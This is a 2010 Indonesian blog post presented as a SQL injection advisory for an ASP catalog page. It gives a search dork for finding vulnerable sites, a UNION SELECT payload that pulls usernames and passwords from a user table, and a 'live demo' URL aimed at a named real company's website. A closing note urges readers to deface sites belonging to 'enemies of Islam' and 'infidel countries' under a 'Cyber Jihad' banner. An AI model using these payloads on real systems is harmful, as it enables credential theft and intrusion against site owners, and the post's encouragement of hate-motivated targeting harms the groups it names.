Selasa, 03 Agustus 2010

Blind SQL Injection Vulnerability

————————————————————————————————————————————————————-
Author : YaDoY666
Contact : YaDoY666[a]ServerIsDown[dot]Org
Group : ServerIsDown
————————————————————————————————————————————————————-

[-] Dork

[+] “catalog/details.asp?id=” or use your own keyword

[-] Exploit

[+] details.asp?id=[id]+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] POC

http://127.0.0.1/catalog/details.asp?id=706+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] Demo Live

http://www.honourfurniture.com.my/catalog/details.asp?id=771+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user


Note : usahakanlah mencari situs milik musuh islam/negara2 kafir 'untuk setiap aksi pendeface'an'

- BRIGADE AL-BANTANI -
--CYBER JIHAD--
Diposting oleh Indonesia di 22.02
Label:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)